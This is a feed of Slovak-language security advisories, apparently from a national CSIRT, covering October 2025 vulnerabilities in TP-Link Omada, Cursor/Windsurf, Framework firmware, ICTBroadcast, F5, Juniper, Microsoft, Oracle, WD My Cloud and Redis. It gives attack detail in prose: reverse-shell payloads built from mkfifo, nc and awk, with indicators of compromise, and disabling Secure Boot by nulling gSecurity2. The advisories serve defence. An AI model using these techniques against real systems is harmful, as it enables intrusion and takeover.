Omada ER7412-M2 vo verziách starších ako 1.1.0 Build 20251015 Rel.63594
Omada ER707-M2 vo verziách starších ako 1.3.1 Build 20251009 Rel.67687
Omada ER7206 vo verziách starších ako 2.2.2 Build 20250724 Rel.11109
Omada ER605 vo verziách starších ako 2.3.1 Build 20251015 Rel.78291
Omada ER706W vo verziách starších ako 1.2.1 Build 20250821 Rel.80909
Omada ER706W-4G vo verziách starších ako 1.2.1 Build 20250821 Rel.82492
Omada ER7212PC vo verziách starších ako 2.1.3 Build 20251016 Rel.82571
Omada G36 vo verziách starších ako 1.1.4 Build 20251015 Rel.84206
Omada G611 vo verziách starších ako 1.2.2 Build 20251017 Rel.45512
Omada FR365 vo verziách starších ako 1.1.10 Build 20250626 Rel.81746
Omada FR205 vo verziách starších ako 1.0.3 Build 20251016 Rel.61376
Omada FR307-M2 vo verziách starších ako 1.2.5 Build 20251015 Rel.76743

Opis zraniteľností:

Kritické zraniteľnosti:

CVE-2025-6542 (CVSS 4.0 skóre 9.3)

CVE-2025-6542 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov operačného systému a získanie úplnej kontroly nad systémom.

CVE-2025-7850 (CVSS 4.0 skóre 9.3)

Kritickú zraniteľnosť by autentifikovaný útočník s administrátorským prístupom do webového rozhrania brán mohol zneužiť na injekciu príkazov a získanie úplnej kontroly nad systémom.

Vysoko závažné zraniteľnosti:

CVE-2025-6541 (CVSS 4.0 skóre 8.6)

Vysoko závažná zraniteľnosť umožňuje útočníkovi prihlásenému do webového administratívneho rozhrania vykonať injekciu príkazov operačného systému.

CVE-2025-7851 (CVSS 4.0 skóre 8.7)

Zraniteľnosť umožňuje získanie neoprávneného prístupu k systémovému shellu s privilégiami používateľa root, obmedzenému oprávneniami zraniteľnej brány.

Možné škody:

Vzdialené vykonanie príkazov
Únik citlivých informácií
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie špecifikované výrobcom. Konkrétne verzie môžete nájsť na stránke výrobcu alebo v časti „Zraniteľné systémy“ tohto varovania. Po aktualizácii systémov taktiež odporúčame vykonať kontrolu konfigurácie zariadení.

Zdroje:

Prostredia Cursor a Windsurf obsahujú desiatky zraniteľností

Marian Danko — Wed, 22 Oct 2025 12:22:26 +0000

Bezpečnostní výskumníci spoločnosti Ox Security upozornili na prítomnosť veľkého množstva známych zraniteľností v aktuálnych verziách vývojových prostredí Cursor a Windsurf, z dôvodu implementácie starých verzií nástrojov Chromium a V8. Výskumníci varujú, že ignorovanie či neaktualizovanie takýchto chýb predstavuje vážnu bezpečnostnú hrozbu.

Zraniteľné systémy:

Cursor 0.47.6 až 1.7.46 (minimálne)
Windsurf, najnovšia verzia

Opis činnosti:

Bezpečnostní výskumníci spoločnosti Ox Security testovali aktuálne verzie vývojových prostredí Cursor a Windsurf. Zistili, že obsahujú viac ako 94 známych a odstránených zraniteľností v prehliadačovom nástroji Chromium a JavaScript V8, pretože obe prostredia používajú staršie verzie platformy Electron. Približne 1,8 milióna vývojárov, ktorí tieto vývojové prostredia používajú, sa vystavuje riziku útokov prostredníctvom zneužitia niektorej z nich.

Výskumníci problém demonštrovali zneužitím zraniteľnosti CVE-2025-7656 kompilátora Maglev JIT v nástroji V8, keď prostredníctvom škodlivého deeplinku dokázali vykonať príkaz presmerúvajúci prehliadač prostredia (Simple Browser) na zdroj škodlivého kódu. Ten sa vykonal bez detekcie, pretože nebol prítomný priamo v príkaze. Autori Cursor sa vyjadrili, že tento problém je mimo ich záujmu, Windsurf na informáciu nereagoval.

Ako ďalšie praktické scenáre útokov uvádzajú nahratie škodlivého rozšírenia, injektovanie škodlivého kódu do dokumentácie a súborov README, ktorý sa v prostrediach vykoná v rámci vykreslenia náhľadu, alebo spearphishing.

Popísaný problém môže vyústiť do útoku na dodávateľský reťazec s významným dopadom, vrátane úniku citlivých podnikových informácií, ktoré majú vývojári uložené na svojich zariadeniach.

Možné škody:

Vykonanie ľubovoľného kódu
Nedostupnosť aplikácie (DoS)
Únik citlivých údajov

Odporúčania:

Jedná o problém na strane vývojárov, autori článku však odporúčajú v rámci bezpečnosti infraštruktúry mať prehľad o používaných vývojových prostrediach a monitorovať sieťovú premávku z cieľom odhaliť únik informácií.

Odkazy:

Zraniteľnosť v UEFI modulárnych počítačov Framework umožňuje inštaláciu bootkitov

Marian Danko — Tue, 21 Oct 2025 14:32:06 +0000

Výrobca modulárnych notebookov a desktopov Framework vydal bezpečnostné aktualizácie firmvéru svojich produktov, ktoré opravujú zraniteľnosť zneužiteľnú na inštaláciu bootkitov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Framework 13 (11th Gen Intel) s firmvérom vo verzii staršej ako 3.24 (výrobca pracuje na aktualizácii)
Framework 13 (12th Gen Intel) s firmvérom vo verzii staršej ako 3.18 (3.19 pre verziu s DBX)
Framework 13 (13th Gen Intel) s firmvérom vo verzii staršej ako 3.08
Framework 13 (Intel Core Ultra) s firmvérom vo verzii staršej ako 3.06
Framework 13 (AMD Ryzen 7040) s firmvérom vo verzii staršej ako 3.16
Framework 13 (AMD Ryzen AI 300) s firmvérom vo verzii staršej ako 3.04 (3.05 pre verziu s DBX)
Framework 16 (AMD Ryzen 7040) s firmvérom vo verzii staršej ako 3.06 (Beta) (3.07 pre verziu s DBX)
Framework Desktop (AMD Ryzen AI 300 MAX) s firmvérom vo verzii staršej ako 3.01 (3.03 pre verziu s DBX)

Opis zraniteľnosti:

CVE identifikátor nebol pridelený (CVSSv3.1 skóre 7,1)

Zraniteľnosť firmvéru spočíva v možnosti prístupu k diagnostickému a debugovaciemu príkazu mm (memory modify), ktorý poskytuje priamy prístup k systémovej pamäti umožňujúci čítanie a zápis. Tento príkaz by útočník s fyzickým prístupom k zariadeniu mohol zneužiť na nastavenie premennej gSecurity2 na hodnotu NULL, čo by viedlo k deaktivácii mechanizmov overovania podpisov firmvéru (Secure Boot). Útočník by následne mohol vykonať modifikáciu firmvéru, inštaláciu bootkitov a získať tak úplnú kontrolu nad systémom.

Pozn.: Zraniteľnosť objavili bezpečnostní výskumníci zo spoločnosti Eclypsium, ktorá ju eviduje pod aliasom BombShell.

Možné škody:

Obídenie bezpečnostného prvku
Neoprávnená zmena v systéme
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať aktualizáciu firmvéru zariadení na verzie špecifikované v časti „Zraniteľné systémy“ tohto varovania. V prípade, že aktualizáciu nie je možné vykonať, odporúčame limitovať fyzický prístup k zariadeniu alebo odstránenie DB kľúča prostredníctvom BIOS.

Zdroje:

Automatický vytáčací systém ICTBroadcast obsahuje aktívne zneužívanú zraniteľnosť

Marian Danko — Tue, 21 Oct 2025 14:31:50 +0000

Výskumníci z VulnCheck zverejnili informácie o aktívne zneužívanej kritickej zraniteľnosti v softvéri ICTBroadcast spoločnosti ICT Innovations, ktorý slúži na správu call centier a automatické vytáčanie hovorov. CVE-2025-2611 možno zneužiť na injekciu shellových príkazov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

ICT Innovations ICTBroadcast vo všetkých verziách až po 7.4 (vrátane)

Opis zraniteľností:

CVE-2025-2611(CVSSv4.0 skóre 9,3)

Kritická zraniteľnosť CVE-2025-2611 spočíva v nedostatočnom overovaní vstupov a vzdialený neautentifikovaný útočník by ich mohol zneužiť na vzdialenú injekciu shellových príkazov do relačných cookies BROADCAST, ktoré sa vykonajú na serveri. To môže viesť ku schopnosti vzdialene vykonávať kód bez autentifikácie.

Na uvedenú zraniteľnosť je dostupný proof of concept kód demonštrujúci mechanizmus jej zneužitia.

Zraniteľnosť objavil bezpečnostný výskumník Valentin Lobstein v marci 2025 a je aktívne zneužívaná minimálne od 11. októbra 2025. Útoky začínajú preverovaním prítomnosti zraniteľnosti, následne dochádza k jej zneužitiu na vytvorenie reverzného shellu. Škodlivý payload využíva príkazy mkfifo, nc, awk kódované v Base64 alebo príkazy Python kódované Base64 a komprimované prostredníctvom zlib. Súvisiace indikátory kompromitácie (IOC) v máji 2025 spoločnosť Fortinet asociovala s e-mailovou kampaňou cielenou na Španielsko, Taliansko a Portugalsko, ktorá šírila malvér Ratty RAT.

Možné škody:

Vzdialená injekcia príkazov
Vzdialené vykonanie kódu
Získanie plnej kontroly nad systémom

Odporúčania:

Na uvedenú zraniteľnosť v súčasnosti nie sú dostupné aktualizácie. Výskumníci do vydania záplat odporúčajú limitovať sieťový prístup k produktu len na dôveryhodné IP adresy alebo zaviesť sanitizáciu a overovanie obsahu session cookies. Taktiež odporúčame vykonať kontrolu logov sieťových a bezpečnostných prvkov na prítomnosť IOC.

Indikátory kompromitácie (IOC):

*.localto[.]net
85sp9bexj.localto[.]net
143.47.53[.]106
86.104.249[.]106

Zdroje:

Útočníci ukradli zdrojový kód a popisy zraniteľností F5 BIG-IP, aktualizujte ihneď!

Marian Danko — Tue, 21 Oct 2025 14:23:06 +0000

Spoločnosť F5 potvrdila, že sa stala obeťou kybernetického útoku, v rámci ktorého sa bližšie nešpecifikovanej štátom sponzorovanej skupine podarilo získať dlhodobý prístup do ich systémov a exfiltrovať citlivé údaje, vrátane zdrojového kódu a konfigurácií časti zákazníkov.

Sumarizácia dostupných informácií:

Útočníci získali zdrojový kód a informácie o nahlásených zraniteľnostiach v produktoch BIG-IP, ktoré ešte neboli opravené ani zverejnené, a taktiež konfiguráciu a implementačné detaily obmedzeného počtu zákazníkov. Podľa dostupných informácií tieto údaje neboli zo strany útočníka zneužité ani zverejnené. Ku kompromitácii dodávateľského reťazca nedošlo, neboli zasiahnuté ani CRM, finančné systémy, zákaznícka podpora, systémy iHealth a systémy asociované s ostatnými produktovými radmi.

F5 sa o incidente dozvedela 9. augusta 2025. Rieši ho v spolupráci s externými špecialistami zo spoločností Mandiant a Crowdstrike. Vykonala rotáciu kryptografického materiálu a prijala dodatočné opatrenia na zabezpečenie systémov. V spolupráci s NCC Group a IOActive bola vykonaná aj analýza rizík a zdrojového kódu.

Podľa portálu Bloomberg systémy F5 kompromitovala čínska štátom sponzorovaná skupina UNC5221 malvérom BrickStorm a zotrvala v sieti vyše 12 mesiacov. Na aktivity tejto skupiny súvisiace so šírením BrickStorm koncom septembra 2025 upozornila GTIG (Google Threat Intelligence Group). Spoločnosť Mandiant sprístupnila skener pre vyhľadávanie známych signatúr indikujúcich prítomnosť BrickStorm v systéme.

F5 v súvislosti s útokom vydala bezpečnostné aktualizácie pre svoje produkty BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ a APM klientov, ktoré opravujú 44 zraniteľností, vrátane tých uniknutých. 27 z nich bolo označených ako vysoko závažné. Konkrétne verzie zraniteľných produktov a odkazy na príslušné aktualizácie môžete nájsť na stránke výrobcu.

Zraniteľné systémy:

BIG-IP (všetky moduly)
BIG-IP AFM
BIG-IP APM, APM with SWG
BIG-IP ASM
BIG-IP PEM
BIG-IP SSL Orchestrator, SSL Orchestrator with SWG
BIG-IP Advanced WAF/ASM
BIG-IP Next CNF, Next SPK, Next for Kubernetes
F5OS-A
F5OS-C
F5 Silverline (všetky služby)
NGINX App Protect WAF

Možné škody:

Eskalácia privilégií
Zneprístupnenie služby (DoS)
Obídenie bezpečnostných prvkov

Odporúčania:

Administrátorom odporúčame bezodkladne:

aplikovať dodatočné odporúčania F5 súvisiace s:
- hardeningom zariadení
- kontrolou integrity pomocou diagnostického nástroja F5 iHealth
- zavedením detailného logovania a monitoringu
- threat huntingom a analýzou dostupných logov na identifikáciu pokusov o zneužitie zraniteľností alebo útokov na produkty F5. Použite aj BrickStorm scanner od Mandiant a SIGMA pravidlá od CIRCL.LU.
vykonať aktualizáciu všetkých identifikovaných produktov na verzie špecifikované výrobcom
v prípade produktov s ukončenou podporou urýchlene zmigrovať na alternatívne produktys platnou podporou
limitovať dostupnosť administratívnych rozhraní produktov len z dôveryhodných IP adries

Zdroje:

Októbrová aktualizácia Windows 11 znemožňuje aplikáciám prístup na localhost

Marian Danko — Mon, 20 Oct 2025 12:13:42 +0000

Aktuálna situácia:

Kumulatívna aktualizácia 2025-10, 64-bitového operačného systému WINDOWS 11 znemožňuje vytvorenie HTTP spojenia s LOCALHOST adresou 127.0.0.1, čo narúša činnosť viacerých aplikácií. Nie je možné napríklad lokálne ladenie v nástroji Visual Studio, autentifikovať sa prostredníctvom SSMS Entra ID a Cisco Duo Desktop, ktoré počas svojej činnosti vyžadujú komunikáciu s komponentmi dostupnými prostredníctvom LOCALHOST.

Zraniteľné systémy:

Windows 11 24H2 aktualizácia KB5066835

Odporúčania:

Pre dočasné odstránenie problému sa odporúča odinštalovanie aktualizácie KB5066835. V prípade, že odstránenie spomínanej aktualizácie nebude možné, odporúča sa odinštalovať aj aktualizáciu KB5065789 spolu s KB5066835.

POZOR: Spoločnosť Microsoft sa zatiaľ k problematickej aktualizácii nevyjadrila a navrhované riešenia problému sú zatiaľ provizórne, pretože pochádzajú od užívateľov zasiahnutých verzií operačného systému, preto môžu mať aj značný dopad na kybernetickú bezpečnosť. Administrátorom odporúčame vykonať kroky na mitigáciu iba ak to je nevyhnutné, a naďalej sledovať aktualizáciu celej situácie od spoločnosti Microsoft.

Zdroje

Juniper Networks vydáva veľký balík bezpečnostných opráv

Marian Danko — Thu, 16 Oct 2025 15:37:39 +0000

Spoločnosť Juniper Networks opravila zhruba 220 zraniteľností vo svojich produktoch Junos OS, Junos Space a Junos Space Security Director. 9 z nich je kritických.

Zraniteľné systémy:

Junos OS, verzie staršie ako 23.4R2-S5, 24.2R2-S1, 24.4R1-S3, 24.4R2 a 25.2R1
Junos OS Evolved, verzie staršie ako 23.4R2-S5-EVO, 24.2R2-S1-EVO, 24.4R1-S3-EVO, 24.4R2-EVO, 25.2R1-EVO
Junos Space, verzie staršie ako 24.1R4
Junos Space Security Director, verzie staršie ako 24.1R4

Opis činnosti:

Spoločnosť Juniper Networks vydala bezpečnostné aktualizácie pre svoje produkty Junos OS, Junos OS Evolved, Junos Space a Junos Space Security Director, ktoré opravujú zhruba 220 zraniteľností, z čoho 9 v Junos Space je označených ako kritické. Popis niektorých z najzávažnejších nájdete nižšie.

Junos Space:

CVE-2025-59978 (CVSS skóre 9,0)

Kritická zraniteľnosť v Junos Space, ktorá umožňuje ukladanie skriptových tagov v rámci textu na stránkach. Útočník tak môže vykonávať útoky typu XSS a spôsobiť vykonanie skriptov a príkazov na zariadení návštevníka škodlivej alebo kompromitovanej stránky, s oprávneniami administrátora.

CVE-2019-12900, CVE-2023-38408, CVE-2024-3596, CVE-2024-27280, CVE-2024-35845, CVE-2024-47538, CVE-2024-47607, CVE-2024-47615

Ostatné kritické zraniteľnosti opravené v októbri.

Medzi ďalšími opravených zraniteľnosťami bola vysoko závažná umožňujúca narušiť dostupnosť služby a stredne závažná dovoľujúca sťahovanie ľubovoľných súborov.

Junos OS:

CVE-2025-59964, CVE-2025-60004 (CVSS skóre 7,5)

V systémoch Junos OS a Junos OS Evolved boli okrem iného opravené dve vysoko závažné zraniteľnosti umožňujúce narušenie dostupnosti služby. Prvá súvisí s použitím neinicializovaného zdroja v komponente Packet Forwarding Engine (PFE). Druhú spôsobuje nevhodná kontrola výnimočných podmienok v komponente routing protocol daemon (rpd).

Junos Space Security Director:

CVE-2025-59968 (CVSS skóre 8,6)

Vysoko závažná zraniteľnosť súvisí s chýbajúcou autorizáciou. Neautentifikovaný útočník na sieti tak môže cez webové rozhranie čítať a upravovať metadáta.

CVE-2025-59974 (CVSS skóre 8,4)

Vysoko závažná zraniteľnosť vzniká kvôli nevhodnej sanitizácii používateľských vstupov. To dovoľuje injektovať a ukladať skripty do aplikácie, ktoré sa vykonajú v kontexte prehliadača obete (uložené XSS).

Možné škody:

Únik citlivých informácií
Nedostupnosť služby (DoS)
Vzdialené vykonávanie kódu
Kompromitácia systému

Odporúčania:

Bezodkladná aktualizácia aspoň na verzie:

Junos OS 23.4R2-S5, 24.2R2-S1, 24.4R1-S3, 24.4R2 alebo 25.2R1
Junos OS Evolved 23.4R2-S5-EVO, 24.2R2-S1-EVO, 24.4R1-S3-EVO, 24.4R2-EVO alebo 25.2R1-EVO
Junos Space 24.1R4
Junos Space Security Director 24.1R4

Odkazy:

Microsoft v októbrovom balíku aktualizácií Patch Tuesday opravil 6 aktívne zneužívaných zraniteľností

Marian Danko — Wed, 15 Oct 2025 11:03:31 +0000

Spoločnosť Microsoft vydala v októbri 2025 balík opráv pre portfólio svojich produktov opravujúci 172 zraniteľností, z ktorých 8 spoločnosť označila ako kritické. Tieto umožňujú vzdialene vykonávať kód a eskalovať oprávnenia. Šesť zraniteľností je aktívne zneužívaných.

Zraniteľné systémy:

.NET 8.0 installed on Linux
.NET 8.0 installed on Mac OS
.NET 8.0 installed on Windows
.NET 9.0 installed on Linux
.NET 9.0 installed on Mac OS
.NET 9.0 installed on Windows
Arc Enabled Servers – Azure Connected Machine Agent
ASP.NET Core 2.3
ASP.NET Core 8.0
ASP.NET Core 9.0
Azure Compute Gallery
Azure Monitor Agent
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 AND 4.7.2
Microsoft .NET Framework 3.5 AND 4.8
Microsoft .NET Framework 3.5 AND 4.8.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 4.8
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Access 2016 (32-bit edition)
Microsoft Access 2016 (64-bit edition)
Microsoft Configuration Manager 2403
Microsoft Configuration Manager 2409
Microsoft Configuration Manager 2503
Microsoft Defender for Endpoint for Linux
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft Exchange Server 2016 Cumulative Update 23
Microsoft Exchange Server 2019 Cumulative Update 14
Microsoft Exchange Server 2019 Cumulative Update 15
Microsoft Exchange Server Subscription Edition RTM
Microsoft JDBC Driver 10.2 for SQL Server
Microsoft JDBC Driver 11.2 for SQL Server
Microsoft JDBC Driver 12.10 for SQL Server
Microsoft JDBC Driver 12.2 for SQL Server
Microsoft JDBC Driver 12.4 for SQL Server
Microsoft JDBC Driver 12.6 for SQL Server
Microsoft JDBC Driver 12.8 for SQL Server
Microsoft JDBC Driver 13.2 for SQL Server
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office for Android
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft PowerPoint 2016 (32-bit edition)
Microsoft PowerPoint 2016 (64-bit edition)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.12
Microsoft Visual Studio 2022 version 17.14
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
microsoft/playwright
Office Online Server
PowerShell 7.4
PowerShell 7.5
Remote Desktop client for Windows Desktop
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 25H2 for ARM64-based Systems
Windows 11 Version 25H2 for x64-based Systems
Windows App Client for Windows Desktop
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)
Xbox Gaming Services

Opis činnosti:

V rámci októbrového balíka Patch Tuesday opravila spoločnosť Microsoft vo svojich produktoch 172 zraniteľností. Z nich 8 bolo zaradených do kategórie kritické a 162 bolo vyhodnotených ako vysoko závažné („Important“). Kritické zraniteľnosti umožňujú vzdialene vykonávať kód a eskalovať oprávnenia.

Microsoft opravil aj nasledovných 6 aktívne zneužívaných zraniteľností.

CVE-2025-24052 a CVE-2025-24990 (CVSS skóre 7,8)

Vysoko závažné zraniteľnosti natívneho ovládača Windows pre zariadenia Agere Modem súvisia s pretečením medzipamäte na zásobníku a dereferenciou nedôveryhodného ukazovateľa. Umožňujú eskalovať oprávnenia na úroveň administrátora. Zneužiť ich možno, aj keď systém nepoužíva daný modem. Microsoft odstránil tento ovládač (súbor ltmdm64.sys) zo systému.

CVE-2025-59230 (CVSS skóre 7,8)

Vysoko závažná zraniteľnosť sa nachádza v komponente Windows Remote Access Connection Manager. Kvôli nedostatočnej kontrole prístupov dovoľuje lokálnemu autorizovanému útočníkovi eskalovať svoje oprávnenia na úroveň SYSTEM.

CVE-2025-47827 (CVSS skóre 4,6)

Zraniteľnosť strednej závažnosti vo verziách IGEL OS starších ako 11 umožňuje obísť prvok Secure Boot. Chyba sa nachádza v ovládači igel-flash-driver, ktorý nesprávne overuje kryptografický podpis, bez ohľadu na jeho expiráciu. Jej zneužitím by útočník mohol napríklad úspešne načítať neoverený image SquashFS.

CVE-2025-0033 (CVSS skóre 8,2)

Vysoko závažná zraniteľnosť procesorov AMD EPYC využívajúcich technológiu Secure Encrypted Virtualization – Secure Nested Paging (SEV-SNP) dovoľuje vzdialené vykonávanie kódu. Súvisí so vznikom súbehu pri inicializácii RMP (Reverse Map Table), ktorý môže lokálny útočník s vysokými oprávneniami zneužiť cez virtuálny stroj na manipuláciu vstupov RMP a integrity hosťovskej pamäte SEV-SNP. Spoločnosť Microsoft pracuje aj na opravách zraniteľnosti pre Azure Confidential Computing.

CVE-2025-2884 (CVSS skóre 5,3)

Zraniteľnosť v špecifikácii TCG TPM2.0 umožňuje prístup k citlivým informáciám. Nachádza sa v implementácii pomocnej funkcie CryptHmacSign, kde je možné čítať obsah pamäte mimo povolené hodnoty.

Možné škody:

Únik citlivých informácií
Vzdialené vykonávanie kódu
Eskalácia oprávnení

Odporúčania:

Administrátorom a používateľom zraniteľných verzií odporúčame bezodkladne vykonať aktualizácie dostupné priamo zo systému alebo zo stránky výrobcu. Pre konkrétny prehľad si treba vo filtroch zvoliť mesiac október a Mode „Update Tuesday“. Bližšie informácie nájdete aj tu.

Odkazy:

Mesačná správa CSIRT.SK – september 2025

Marian Danko — Tue, 14 Oct 2025 13:08:57 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci september 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 09/2025 PDF (1 776 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

Zraniteľnosť v Oracle E-Business Suite

Marian Danko — Tue, 14 Oct 2025 12:30:00 +0000

Spoločnosť Oracle vydala bezpečnostnú aktualizáciu na svoj produkt E-Business Suite, ktorá opravuje vysoko závažnú zraniteľnosť. CVE-2025-61884 by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na kompromitáciu Oracle Configurator a získanie neoprávneného prístupu k citlivým údajom.
[aktualizácia 21.10.2025] zraniteľnosť CVE-2025-61884 bola pridaná do zoznamu aktívne zneužívaných

Zraniteľné systémy:

Oracle E-Business Suite 12.2.3-12.2.14

Opis činnosti:

CVE-2025-61884 (CVSS v3.1 skóre 7,5)

Vysoko závažná zraniteľnosť v komponente Runtime UI aplikácie Oracle Configurator, ktorá je súčasťou Oracle E-Business Suite. Neautentifikovaný útočník so sieťovým prístupom môže jej zneužitím cez protokol HTTP získať prístup k citlivým informáciám, resp. všetkým dátam dostupným pre Oracle Configurator. Bližšie informácie o zraniteľnosti neboli zverejnené.

[Aktualizácia] Aktuálne prebieha kampaň skupiny Clop zameraná na krádež údajov zákazníkov Oracle. Skupina Clop potvrdila, že v rámci útokov zneužíva zraniteľnosť CVE-2025-61884.

Možné škody:

Únik citlivých informácií

Odporúčania:

Bezodkladná aktualizácia na opravené verzie podľa dokumentácie spoločnosti Oracle.

Odkazy:

Kritická zraniteľnosť v sieťových úložiskách WD My Cloud umožňuje vzdialené vykonanie kódu

Marian Danko — Mon, 13 Oct 2025 14:45:32 +0000

Spoločnosť Western Digital vydala aktualizácie firmvéru viacerých modelov zariadení NAS (Network Attached Storage) série My Cloud, ktoré opravujú kritickú zraniteľnosť. CVE-2025-30247 možno zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

NAS zariadenia Western Digital My Cloud PR2100, My Cloud PR4100, My Cloud EX4100, My Cloud EX2 Ultra, My Cloud Mirror Gen 2, My Cloud EX2100, My Cloud WDBCTLxxxxxx-10, My Cloud s firmvérom vo verziách starších ako 5.31.108
NAS zariadenia Western Digital My Cloud DL2100, My Cloud DL4100 vo všetkých verziách firmvéru (jedná sa o produkty s ukončenou podporou)

Opis zraniteľnosti:

CVE-2025-30247 (CVSSv4.0 skóre 9,3)

Kritická zraniteľnosť sa nachádza v používateľskom rozhraní a spočíva v nedostatočnom overovaní používateľských vstupov. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek HTTP POST mohol zneužiť na injekciu príkazov operačného systému a získanie úplnej kontroly nad systémom.

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu firmvéru NAS na verziu 5.31.108. Medzi zraniteľnými modelmi sú aj dva s ukončenou technickou podporou (My Cloud DL4100, My Cloud DL2100). V prípade týchto zariadení odporúčame urýchlenú migráciu na alternatívne produkty s platnou podporou. Zraniteľnosť je možné dočasne mitigovať aj odpojením zariadenia od internetu.

Zdroje:

Kritická zraniteľnosť v Redis umožňuje vzdialené vykonanie kódu

Marian Danko — Fri, 10 Oct 2025 15:32:51 +0000

Vývojári in-memory NoSQL úložiska Redis vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. CVE-2025-49844 by vzdialený autentifikovaný útočník mohol zneužiť na vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Redis Software, vo všetkých verziách
Redis OSS/CE/Stack with Lua scripting, vo všetkých verziách

Opis zraniteľnosti:

CVE-2025-49844 (CVSSv3.1 skóre 9,9)

Kritická zraniteľnosť s identifikátorom CVE-2025-49844 (alias RediShell) sa nachádza v rámci interpretera Lua a spočíva v použití odalokovaného miesta v pamäti. Vzdialený autentifikovaný útočník by ju prostredníctvom špeciálne vytvorených skriptov Lua mohol zneužiť na únik z Lua sandboxu, vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom. Zraniteľnosť odhalili bezpečnostní výskumníci z WIZ na hackerskej súťaži Pwn2Own v Berlíne.

Zraniteľnosť možno zneužiť len na inštanciách, na ktorých je povolené vykonávanie skriptov Lua. Skripty Lua sú v predvolenej konfigurácii zapnuté. Z dôvodu nesprávnej konfigurácie je veľké množstvo inštancií dostupných z internetu prevádzkovaných bez autentifikácie, čo ich vystavuje priamemu riziku zneužitia tejto zraniteľnosti.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu

Redis Software na verzie 7.22.2-12, 7.8.6-207, 7.4.6-272, 7.2.4-138, 6.4.2-131 alebo novšie
Redis OSS/CE so skriptovaním Lua na verzie 8.2.2, 8.0.4, 7.4.6, 7.2.11. alebo novšie
Redis Stack so skriptovaním Lua na verzie 7.4.0-v7, 7.2.0-v19 alebo novšie

V prípade, že aktualizáciu nie je možné vykonať, zraniteľnosť možno mitigovať zavedením ACL (Access Control List) zakazujúceho vykonanie príkazov EVAL a EVALSHA.

Rovnako odporúčame na inštanciách vyžadovať autentifikáciu a neprevádzkovať ich voľne prístupné z internetu. Ak systémy musia byť prístupné, použite VPN alebo prostredníctvom sieťových a bezpečnostných prvkov limitujte prístup len na dôveryhodné siete.

Zdroje:

DrayTek opravil závažnú zraniteľnosť vo webovom rozhraní routerov Vigor

Marian Danko — Fri, 10 Oct 2025 15:30:30 +0000

